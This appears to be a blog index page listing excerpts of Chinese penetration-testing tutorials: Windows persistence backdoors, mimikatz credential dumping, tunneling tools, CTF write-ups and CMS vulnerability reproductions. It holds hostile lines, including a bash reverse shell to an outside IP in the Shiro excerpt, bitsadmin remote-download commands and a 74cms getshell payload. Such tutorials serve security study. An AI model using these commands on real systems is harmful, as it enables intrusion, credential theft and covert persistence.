自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

浅笑996的博客

一个什么也不精通的白帽子

  • 博客(175)
  • 收藏
  • 关注

转载 如何做一名合格的白帽子?

请遵守以下条例:目录第一章 总 则第二章 网络安全支持与促进第三章 网络运行安全第一节 一般规定第二节 关键信息基础设施的运行安全第四章 网络信息安全第五章 监测预警与应急处置第六章 法律责任第七章 附 则条文第一章 总 则第一条 为了保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息...

2018-10-17 23:23:18 511

原创 使用digispark制作一个BadUSB

0X00、工具准备digispark开发板。淘宝连接:https://m.tb.cn/h.VK7vwjy?sm=d858440X01、安装Arduino IDE环境1、安装 arduino 的 IDE。下载地址:https://www.arduino.cc/en/Main/Software新版下载:https://downloads.arduino.cc/arduino-1.8.3-windows.zip2、下载驱动链接:http...

2020-07-03 16:11:26 3366 3

原创 wordpress在线检测主题和插件

http://wpthemedetector.coderschool.cn/http://www.wpthemedetector.com/http://whatwpthemeisthat.comhttp://whattheme.com/http://builtwith.com

2020-07-03 11:14:12 1029

原创 后门及持久化访问4----Com组件劫持

代码及原理介绍 COM是Component Object Model(组件对象模型)的缩写,COM组件由DLL和EXE形式发布的可执行代码所组成。每个COM组件都有一个CLSID,这个CLSID是注册的时候写进注册表的,可以把这个CLSID理解为这个组件最终可以实例化的子类的一个ID。这样就可以通过查询注册表中的CLSID来找到COM组件所在的dll的名称。所以要想COM劫持,必须精心挑选CLSID,尽量选择应用范围广的CLSID。这里,我们选择的CLSID为:{b5f8350b-0548...

2020-07-01 14:55:29 951

原创 后门及持久化访问3----进程注入之AppInit_DLLs注册表项

进程注入之AppInit_DLLs注册表项User32.dll被加载到进程时,会获取AppInit_DLLs注册表项,若有值,则调用LoadLibrary() API加载用户DLL。只会影响加载了user32.dll的进程。HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Window\Appinit_Dlls代码如下:#include #include using namespace std;int

2020-07-01 14:55:11 700

原创 后门及持久化访问2----进程注入之AppCertDlls 注册表项

代码及原理介绍如果有进程使用了CreateProcess、CreateProcessAsUser、CreateProcessWithLoginW、CreateProcessWithTokenW或WinExec函数,那么此进程会获取HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\AppCertDlls注册表项,此项下的dll都会加载到此进程。Win7版本下没有“AppCertDlls”项,需自己创建。代码如下

2020-07-01 14:54:50 985

原创 后门及持久化访问1----辅助功能镜像劫持

代码及原理介绍 为了使电脑更易于使用和访问,Windows添加了一些辅助功能。这些功能可以在用户登录之前以组合键启动。根据这个特征,一些恶意软件无需登录到系统,通过远程桌面协议就可以执行恶意代码。一些常见的辅助功能如:C:\Windows\System32\sethc.exe 粘滞键 快捷键:按五次shift键 C:\Windows\System32\utilman.exe 设置中心 快捷键:Windows+U键 在较早的Wind...

2020-07-01 14:54:29 468

原创 meterpreter中使用mimikatz获取windows密码

进去meterpreter后getuid一下这获得系统管理员权限开始加载mimikatz模块load mimikatz加载成功.第一种方法:获取登录密码的hash值msv上面已经是得到hash值了. 下面算明文密码.获取明文密码kerberoslook...拿到登录的明文密码了.第二种方法:使用另一种方式获取哈希值mimikatz_command -f samdump::hashes根据上面的方式获取明文密码...

2020-07-01 14:54:08 4027

原创 端口转发工具--lcx

简介 lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路。它常用于外网连接内网3389端口。使用1.将本地接口转发到远程主机的端口。攻击者ip:192.168.1.2受害者ip:192.168.1.3将lcx.exe上传到受害者主机..

2020-06-29 14:50:14 1071

原创 内网代理工具--EarthWorm

一、简介 EarthWorm是内网穿透的神器,拥有三项功能正向代理,反向代理,端口转发。为实现这些功能,EarthWorm建立了六大功能模块。分别是ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slave。从三项功能的角度可以这样划分 功能名称 对应模块 正向代理 ssocksd 反向代理 rcsoc...

2020-06-29 14:49:57 1994

原创 CVE-2019-0708 RCE复现

漏洞环境192.168.91.136 windows7 6.1.7601 192.168.91.151 kaliWindows7 SP1下载链接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/复现过程1、首先升级MSFapt-get updateapt-get install metaspl...

2020-06-29 14:49:17 590

原创 内网代理工具--reGeorg

一、简介 reGeorg是reDuh的继承者,利用了会话层的socks5协议,效率更高结合Proxifier使用 Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。该文件下支持php,asp,jsp,aspx。 ProxyChains是kali中的一个代理工具下载地址: reGeorg https://github.com/sensepost...

2020-06-29 14:48:48 2140 1

原创 PhpMyadmin后台拿webshell方法总结

前言:phpmyadmin后台拿webshell的方法主要分为两个方法:(1) 、通过日志文件拿webshell;(2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难);本地搭建环境:Phpmystudy 2018PHP--5.5.38一、日志文件写入一句话来获取webshell:(1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个

2020-06-29 14:48:07 3643

原创 bitsadmin windwos自带下载命令

bitsadmin的四种下载文件的方法一、bitsadmin /rawreturn /transfer getfile http://qianxiao996.cn/1.txt c:\1.txt二、bitsadmin /rawreturn /transfer getpayload http://qianxiao996.cn/1.txt c:\1.txt三、bitsadmin /transfer qianxiao996 http://qianxiao996.cn/1.txt c:\

2020-06-29 14:46:57 491

原创 内网穿透工具--frp

对于没有公网 IP 的内网用户来说,远程管理或在外网访问内网机器上的服务是一个问题。 今天给大家介绍一款好用内网穿透工具 FRP,FRP 全名:Fast Reverse Proxy。FRP 是一个使用 Go 语言开发的高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务。FRP 支持 TCP、UDP、HTTP、HTTPS等协议类型,并且支持 Web 服务根据域名进行路由转发。FRP 项目地址:https://github.com/fatedier/frp1、安装首先去frp的发

2020-06-29 14:46:12 338

原创 各种环境下反弹shell

0x00 NC命令详解在介绍如何反弹shell之前,先了解相关知识要点。nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp,详细参数如下-g<网关> 设置路由器跃程通信网关,最多可设置8个。 -G<指向器数目> 设置来源路由指向器,其数值为4的倍数。 -h 在线帮助。 -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。 -l 使用监听模式,管

2020-06-29 14:45:15 526

原创 利用公网Msf+MS17010跨网段攻击内网

其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。一、准备工作1.安装了Msf的公网主机+Ubuntu系统2.一台其他服务器内网存在445漏洞3.细心,细心,细心,钻研,钻研!!!二、反弹一个shell第一步:公网主机操作生成msf木马:msfvenom -p windows/meter

2020-06-29 14:44:19 2543 1

原创 FrameScan-GUI CMS漏洞扫描

工具简介FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan的加强版。支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。Github地址:https://github.com/qianxiao996/FrameScan-GUI下载地址:https://github.com/qianxiao996/FrameScan-GUI/releases支持平台

2020-06-28 18:12:55 1383

原创 CTF--这好像不是文件上传

打开题目F12看到一个被注释的跳转。访问可以知道是一个文件包含经过测试,该文件禁止了input、data关键字。并禁止了phar://协议。使用php://filter读取题目源码得到http://47.94.221.39:8003/index.php?filename=php://filter/read=convert.base64-encode/resource=index.php读取upload.php文件源码如下:可以看出upload文件将上传..

2020-06-28 18:11:17 679

原创 CTF--Do you like xml

题目链接:http://47.94.221.39:8008/扫描目录得到/.DS_Store文件下载文件,直接用脚本进行还原操作。https://github.com/lijiejie/ds_store_exp打开backend文件直接搜索得到flag

2020-06-28 18:08:01 314

原创 FrameScan CMS漏洞扫描

工具简介GithubL:https://github.com/qianxiao996/FrameScanFrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。支持平台 Windows Linux MAC(请自测) 工具特点 单URL批量检测 单URL单漏洞检测 单URL指定CMS检测 多

2020-06-28 18:06:42 645

原创 .htaccess文件构成的PHP后门

1、.htaccess文件2、文件上传绕过一般.htaccess可以用来留后门和针对黑名单绕过创建一个txt写入(png解析为php)AddTypeapplication/x-httpd-php.png另存为.htaccess上传.htaccess 必须是网站根路径3、留后门可以在.htaccess 加入php解析规则类似于把文件名包含1的解析成php<FilesMatch"1">SetHandlerapplication/x-http...

2020-06-28 18:03:32 2513

原创 .user.ini文件构成的PHP后门

本篇文章是转载:原文地址:http://www.vuln.cn/6001.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.htaccess有局限性。0x01 .user.ini那么什么是.user.ini?这得从php.ini说

2020-06-28 18:01:13 1578

原创 74cms v4.2.1-v4.2.129-后台getshell漏洞复现

0x00 影响范围v4.2.1-v4.2.1290x01 环境搭建1. 先去官网下载 骑士人才系统基础版(安装包)2.将下载好的包进行安装0x02 复现过程当前版本v4.2.111点加工具,点击风格模板Payload:http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'shell地址:http://127.0....

2020-06-28 17:48:44 1256

原创 Discuz!X系列全版本后台sql注入复现

圈子某位大佬公布的0day,拿来刷一刷,漏洞分析请移步大佬文章。大佬链接0x01 环境准备1、首先去码云下载最新版本的discuz(DiscuzX 3.4 R20191201)。2、将upaod放置到网站目录下,访问安装目录安装即可。0x02 漏洞复现点击站长--UCenter设置点击最下面的提交进行抓包判断列数1' order by 1 //返回正确1' order by 2 //返回错误查询当前用户1' and updatexml(.

2020-06-28 17:23:04 2935 1

原创 CTF-Tools 一款CTF古典密码加解密工具

CTF-Tools一款CTF编码、解码、加密、解密工具。支持的编码解码:URL-UTF-8 URL-GB2312 Unicode Escape(%U) HtmlEncode ACSII Base16 Base32 Base64 Str->Hex Shellcode支持的加密解密:Rot13 凯撒密码 栅栏密码 培根密码 摩斯密码 移位密码 云影密码 当铺密码 维尼吉亚密码进制转换:2->8 2->10 2->16

2020-06-28 17:16:02 6549

原创 Apache Shiro反序列化远程代码执行复现

1、寻找目标首先FOFA找一个环境,检测工具检测一下发现目标,开干!2、开启监听首先在vps运行nc 监听一个端口nc -lvp 666列出需要使用的反弹指令bash -i >& /dev/tcp/129.204.xxx.xxx/666 0>&1将指令放到http://www.jackson-t.ca/runtime-exec-payloads.html转换成加密后的指令将指令合成为一个java的监听指令...

2020-06-28 17:06:09 1704

原创 内网渗透----横向移动

SMB WMI使用wmic查询远程主机进程信息:wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process list brief创建进程:wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process cal...

2019-05-31 20:03:42 1132

原创 内网渗透----常见后门

0x01.综合利用手法1.Smbrelaysmbrelayx.py由于此手法是中间件攻击,需要关闭SMB的签名措施,Windows Server默认开启,其他系统默认关闭,使用 nmap扫描一下未开启签名的机器:nmap -sT -p 445 --open --script smb-security-mode.nse,smb-os-discovery.nse 192.168.91.0/24...

2019-05-31 20:03:29 1175

原创 内网渗透----windows信息收集整理

一、基础信息收集1.信息收集类型操作系统版本、内核、架构是否在虚拟化环境中,已安装的程序、补丁网络配置及连接防火墙设置用户信息、历史纪录(浏览器、登陆密码)共享信息、敏感文件、缓存信息、服务等2.系统信息systeminfo功能:心事有关计算机及其操作系统的详细配置,包括操作系统配置,安全信息,产品ID和硬件属性(如RAM,磁盘空间和网卡)Eggsysteminfo ...

2019-04-14 18:23:39 919

原创 内网渗透----域内信息收集

工具使用Nslookupnslookup # 进入交互式界面set type=all # 设置记录类型,可以设置为srv_ldap._tcp.dc._msdcs.school.com # 执行查询ADFind.exe列出域控列表Adfind.exe -sc...

2019-04-14 18:17:08 1347

原创 PowerSploit的使用

Invoke-Mimikatz(依赖管理员)Import-Module .\invoke-mimikatz.ps1Invoke-Mimikatz –DumpCreds使用Invoke-Mimikatz –command “mimikatz命令”来执行命令:Invoke-Mimikatz –command "token::elevate"Invoke-Ninjacopy (依赖管理...

2019-03-26 18:07:55 597

原创 74CMS 3.0 SQL注入漏洞后台

代码审计工具:seay CMS:74CMS3.0一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定漏洞分析4...

2019-03-26 18:07:36 2514 1

原创 内网渗透----文件传输

0x01.Windows目标1.FTPecho open 192.168.0.23 2121 &amp;amp;gt;&amp;amp;gt; 1.txt //登陆FTP服务器echo 123&amp;amp;gt;&amp;amp;gt;1.txt //用户名echo 123&amp;amp;gt;&amp;amp;gt;1.txt

2019-03-08 11:59:13 1382

原创 YCCMS 3.3 CSRF漏洞--代码执行

一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\YCCMS),点击确定漏洞分析1.点击展开左侧admin目录,在弹出的下拉列表中双击index.php页面,右侧页面可以看到相关代码。&amp;lt;?phprequir...

2019-02-14 17:29:23 2542

原创 74CMS 3.0 存储型XSS漏洞

一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定漏洞分析1.点击展开左侧link目录,弹出的下拉列表中双击a...

2019-01-09 15:42:53 814

原创 内网渗透----欺骗攻击

Ettercapettercapettercap -i eth0 -T -q -M arp:remote /192.168.199.171// /192.168.199.1//driftnetdriftnet -i eth0 -atcpdumptcpdump -i eth0 arp -w 3当192.168.199.171浏览图片时,会自动将图片下载至目录中:当192.1...

2019-01-09 15:42:24 1101

原创 74CMS 3.0 CSRF漏洞

一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定漏洞分析1.点击展开左侧admin目录,在弹出的下拉列表中双...

2018-12-27 19:31:25 1029

原创 phpmyadmin 4.8.1 文件包含漏

一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\phpmyadmin),点击确定漏洞分析1.双击index.php页面,将鼠标滚动到页面第53行// If we have a valid target, let'...

2018-12-27 19:31:11 1192

原创 phpcms 2008 变量覆盖漏洞

一、 启动环境1.双击运行桌面phpstudy.exe软件2.点击启动按钮,启动服务器环境二、代码审计1.双击启动桌面Seay源代码审计系统软件3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\ phpcms 2008),点击确定漏洞分析1.点击展开/yp/web/include/common.inc.php&amp;amp;lt;?phpdefined('IN_PHP...

2018-12-26 17:47:15 457

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除